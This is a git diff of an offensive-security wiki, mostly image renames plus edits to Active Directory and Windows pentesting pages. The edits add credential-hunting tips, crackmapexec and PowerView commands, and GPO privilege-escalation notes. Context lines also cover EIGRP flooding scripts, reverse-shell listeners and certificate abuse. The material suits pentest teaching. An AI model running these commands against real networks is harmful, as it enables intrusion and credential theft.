GitBook: [#3572] No subject
Before Width: | Height: | Size: 25 KiB After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 51 KiB |
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 51 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 346 KiB |
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 346 KiB |
Before Width: | Height: | Size: 143 KiB After Width: | Height: | Size: 53 KiB |
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 143 KiB |
BIN
.gitbook/assets/image (37) (1).png
Normal file
After Width: | Height: | Size: 80 KiB |
Before Width: | Height: | Size: 80 KiB After Width: | Height: | Size: 18 KiB |
BIN
.gitbook/assets/image (38) (1).png
Normal file
After Width: | Height: | Size: 490 KiB |
Before Width: | Height: | Size: 490 KiB After Width: | Height: | Size: 25 KiB |
Before Width: | Height: | Size: 99 KiB |
Before Width: | Height: | Size: 37 KiB After Width: | Height: | Size: 99 KiB |
Before Width: | Height: | Size: 110 KiB After Width: | Height: | Size: 37 KiB |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 110 KiB |
BIN
.gitbook/assets/image (41) (1).png
Normal file
After Width: | Height: | Size: 4.5 KiB |
Before Width: | Height: | Size: 4.5 KiB After Width: | Height: | Size: 12 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 20 KiB |
|
@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these
|
||||||
|
|
||||||
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
|
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the router’s CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **It’s caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually I’ll rewrite the script in C.**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Arguments of the script:
|
Arguments of the script:
|
||||||
|
|
||||||
|
@ -173,7 +173,7 @@ Script arguments:
|
||||||
|
|
||||||
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
|
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Script arguments
|
Script arguments
|
||||||
|
|
||||||
|
@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr
|
||||||
|
|
||||||
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
|
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (4) (1).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>
|
||||||
|
|
||||||
|
|
|
@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
|
||||||
|
|
||||||
The next step is to choose `Install app from file` and upload the application.
|
The next step is to choose `Install app from file` and upload the application.
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
|
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
|
||||||
|
|
||||||
|
|
|
@ -307,6 +307,13 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
|
||||||
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
|
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
|
||||||
|
|
||||||
|
{% hint style="info" %}
|
||||||
|
The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\
|
||||||
|
You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**.
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
## Read Registry
|
## Read Registry
|
||||||
|
|
||||||
You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:
|
You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:
|
||||||
|
|
|
@ -225,24 +225,9 @@ If you have managed to enumerate the active directory you will have **more email
|
||||||
|
|
||||||
### **Looks for Creds in Computer Shares**
|
### **Looks for Creds in Computer Shares**
|
||||||
|
|
||||||
Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).\
|
Now that you have some basic credentials you should check if you can **find** any **interesting files being shared inside the AD**. You could do that manually but it's a very boring repetitive task (and more if you find hundreds of docs you need to check).
|
||||||
You can get help from automatic tools such as:
|
|
||||||
|
|
||||||
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
|
****[**Follow this link to learn about tools you could use.**](../../network-services-pentesting/pentesting-smb.md#domain-shared-folders-search)****
|
||||||
|
|
||||||
```bash
|
|
||||||
Snaffler.exe -s -d domain.local -o snaffler.log -v data
|
|
||||||
```
|
|
||||||
|
|
||||||
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
|
|
||||||
* `-M spider_plus [--share <share_name>]`
|
|
||||||
* `--pattern txt`
|
|
||||||
|
|
||||||
```bash
|
|
||||||
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
|
|
||||||
```
|
|
||||||
|
|
||||||
Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
|
|
||||||
|
|
||||||
### Steal NTLM Creds
|
### Steal NTLM Creds
|
||||||
|
|
||||||
|
|
|
@ -493,7 +493,7 @@ Then, we change back the `userPrincipalName` of `Jane` to be something else, lik
|
||||||
|
|
||||||
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.
|
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## Weak Certificate Mappings - ESC10
|
## Weak Certificate Mappings - ESC10
|
||||||
|
|
||||||
|
@ -538,7 +538,7 @@ Notice that the `userPrincipalName` in the certificate is `Administrator`.
|
||||||
|
|
||||||
Then, we change back the `userPrincipalName` of `Jane` to be something else, like her original `userPrincipalName` `Jane@corp.local`.
|
Then, we change back the `userPrincipalName` of `Jane` to be something else, like her original `userPrincipalName` `Jane@corp.local`.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (4) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.
|
Now, if we try to authenticate with the certificate, we will receive the NT hash of the `Administrator@corp.local` user. You will need to add `-domain <domain>` to your command line since there is no domain specified in the certificate.
|
||||||
|
|
||||||
|
|
|
@ -83,7 +83,7 @@ In the previous flow it was used the trust hash instead of the **clear text pass
|
||||||
|
|
||||||
The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
|
The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (2) (1) (2).png>)
|
![](<../../.gitbook/assets/image (2) (1).png>)
|
||||||
|
|
||||||
Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
|
Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
|
||||||
|
|
||||||
|
|
|
@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo
|
||||||
|
|
||||||
Now establish the session, which will forward us to **the first server**.
|
Now establish the session, which will forward us to **the first server**.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
|
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
|
||||||
|
|
||||||
|
@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
|
||||||
|
|
||||||
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
|
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### OpenSSH <a href="#openssh" id="openssh"></a>
|
### OpenSSH <a href="#openssh" id="openssh"></a>
|
||||||
|
|
||||||
|
@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh
|
||||||
|
|
||||||
Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
|
Uncompress the zip to where you’d like. Then, run the install script - `Install-sshd.ps1`
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (38).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
|
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
|
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.
|
||||||
|
|
||||||
|
|
|
@ -18,7 +18,7 @@ The most up-to-date version of PowerView will always be in the dev branch of Pow
|
||||||
|
|
||||||
### Quick enumeration
|
### Quick enumeration
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
Get-NetDomain #Basic domain info
|
Get-NetDomain #Basic domain info
|
||||||
#User info
|
#User info
|
||||||
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
|
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
|
||||||
|
@ -51,7 +51,7 @@ Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, Active
|
||||||
|
|
||||||
### Domain info
|
### Domain info
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
# Domain Info
|
# Domain Info
|
||||||
Get-Domain #Get info about the current domain
|
Get-Domain #Get info about the current domain
|
||||||
Get-NetDomain #Get info about the current domain
|
Get-NetDomain #Get info about the current domain
|
||||||
|
@ -76,7 +76,7 @@ Get-ForestDomain
|
||||||
|
|
||||||
### Users, Groups, Computers & OUs
|
### Users, Groups, Computers & OUs
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
# Users
|
# Users
|
||||||
## Get usernames and their groups
|
## Get usernames and their groups
|
||||||
Get-DomainUser -Properties name, MemberOf | fl
|
Get-DomainUser -Properties name, MemberOf | fl
|
||||||
|
@ -105,6 +105,9 @@ Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marke
|
||||||
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
|
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
|
||||||
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
|
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
|
||||||
}
|
}
|
||||||
|
# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
|
||||||
|
## Users with this flag might have empty passwords (if allowed) or shorter passwords
|
||||||
|
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
|
||||||
|
|
||||||
#Groups
|
#Groups
|
||||||
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
|
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
|
||||||
|
@ -141,7 +144,7 @@ Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers in
|
||||||
|
|
||||||
### Logon and Sessions
|
### Logon and Sessions
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
|
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
|
||||||
Get-NetSession -ComputerName <servername> #Get active sessions on the host
|
Get-NetSession -ComputerName <servername> #Get active sessions on the host
|
||||||
Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))
|
Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))
|
||||||
|
@ -149,12 +152,14 @@ Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admi
|
||||||
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
|
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
|
||||||
```
|
```
|
||||||
|
|
||||||
### GPOs
|
### Group Policy Object - GPOs
|
||||||
|
|
||||||
```bash
|
If an attacker has **high privileges over a GPO** he could be able to **privesc** abusing it by **add permissions to a user**, **add a local admin user** to a host or **create a scheduled task** (immediate) to perform an action.\
|
||||||
|
For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse.md#gpo-delegation).
|
||||||
|
|
||||||
|
```powershell
|
||||||
#GPO
|
#GPO
|
||||||
Get-DomainGPO | select displayName
|
Get-DomainGPO | select displayName #Check the names for info
|
||||||
## Get-DomainGPO and Get-NetGPO are similar
|
|
||||||
Get-NetGPO #Get all policies with details
|
Get-NetGPO #Get all policies with details
|
||||||
Get-NetGPO | select displayname #Get the names of the policies
|
Get-NetGPO | select displayname #Get the names of the policies
|
||||||
Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
|
Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
|
||||||
|
@ -166,6 +171,13 @@ Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io"
|
||||||
# Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights
|
# Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights
|
||||||
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
|
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
|
||||||
|
|
||||||
|
# Get permissions a user/group has over any GPO
|
||||||
|
$sid=Convert-NameToSid "Domain Users"
|
||||||
|
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
|
||||||
|
|
||||||
|
# COnvert GPO GUID to name
|
||||||
|
Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532
|
||||||
|
|
||||||
# Transform SID to name
|
# Transform SID to name
|
||||||
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126
|
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126
|
||||||
|
|
||||||
|
@ -187,7 +199,7 @@ Learn how to **exploit permissions over GPOs and ACLs** in:
|
||||||
|
|
||||||
### ACL
|
### ACL
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
#Get ACLs of an object (permissions of other objects over the indicated one)
|
#Get ACLs of an object (permissions of other objects over the indicated one)
|
||||||
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
|
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
|
||||||
|
|
||||||
|
@ -210,7 +222,7 @@ Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "f
|
||||||
|
|
||||||
### Shared files and folders
|
### Shared files and folders
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
|
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
|
||||||
Find-DomainShare -CheckShareAccess #Search readable shares
|
Find-DomainShare -CheckShareAccess #Search readable shares
|
||||||
Find-InterestingDomainShareFile #Find interesting files, can use filters
|
Find-InterestingDomainShareFile #Find interesting files, can use filters
|
||||||
|
@ -218,7 +230,7 @@ Find-InterestingDomainShareFile #Find interesting files, can use filters
|
||||||
|
|
||||||
### Domain Trust
|
### Domain Trust
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
|
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
|
||||||
Get-DomainTrust #Same
|
Get-DomainTrust #Same
|
||||||
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
|
Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
|
||||||
|
@ -237,7 +249,7 @@ Get-DomainForeignGroupMember #Get groups with privileges in other domains inside
|
||||||
|
|
||||||
### L**ow**-**hanging fruit**
|
### L**ow**-**hanging fruit**
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
#Check if any user passwords are set
|
#Check if any user passwords are set
|
||||||
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
|
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
|
||||||
|
|
||||||
|
@ -277,7 +289,7 @@ Invoke-UserHunter -Stealth
|
||||||
|
|
||||||
### Deleted objects
|
### Deleted objects
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
|
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
|
||||||
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
|
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
|
||||||
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
|
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
|
||||||
|
@ -287,19 +299,19 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
|
||||||
|
|
||||||
#### SID to Name
|
#### SID to Name
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
|
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Kerberoast
|
#### Kerberoast
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
|
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Use different credentials (argument)
|
#### Use different credentials (argument)
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
# use an alterate creadential for any function
|
# use an alterate creadential for any function
|
||||||
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
|
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
|
||||||
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
||||||
|
@ -308,7 +320,7 @@ Get-DomainUser -Credential $Cred
|
||||||
|
|
||||||
#### Impersonate a user
|
#### Impersonate a user
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
# if running in -sta mode, impersonate another credential a la "runas /netonly"
|
# if running in -sta mode, impersonate another credential a la "runas /netonly"
|
||||||
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
||||||
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
||||||
|
@ -319,7 +331,7 @@ Invoke-RevertToSelf
|
||||||
|
|
||||||
#### Set values
|
#### Set values
|
||||||
|
|
||||||
```bash
|
```powershell
|
||||||
# set the specified property for the given user identity
|
# set the specified property for the given user identity
|
||||||
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
|
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
|
||||||
# Set the owner of 'dfm' in the current domain to 'harmj0y'
|
# Set the owner of 'dfm' in the current domain to 'harmj0y'
|
||||||
|
|
|
@ -34,12 +34,12 @@ It is then possible to invoke the `ExecuteShellCommand` method to start a proces
|
||||||
|
|
||||||
The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
|
The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (4) (1) (2) (1).png>)
|
![](<../../.gitbook/assets/image (4) (1) (2).png>)
|
||||||
|
|
||||||
You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
|
You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
|
||||||
Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
|
Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)’s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (3) (1) (1) (2).png>)
|
![](<../../.gitbook/assets/image (3) (1) (1).png>)
|
||||||
|
|
||||||
Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:
|
Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:
|
||||||
|
|
||||||
|
|
|
@ -1154,6 +1154,12 @@ Search in `C:\ProgramData\Microsoft\Group Policy\history` or in _**C:\Documents
|
||||||
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
|
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using crackmapexec to get the passwords:
|
||||||
|
|
||||||
|
```shell-session
|
||||||
|
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
|
||||||
|
```
|
||||||
|
|
||||||
### IIS Web Config
|
### IIS Web Config
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
|
|
@ -115,7 +115,7 @@ c:\Users\Public>
|
||||||
|
|
||||||
### Launch a new CMD (if you have RDP access)
|
### Launch a new CMD (if you have RDP access)
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (37).png>)
|
![](<../../.gitbook/assets/image (37) (1).png>)
|
||||||
|
|
||||||
## CLSID Problems
|
## CLSID Problems
|
||||||
|
|
||||||
|
|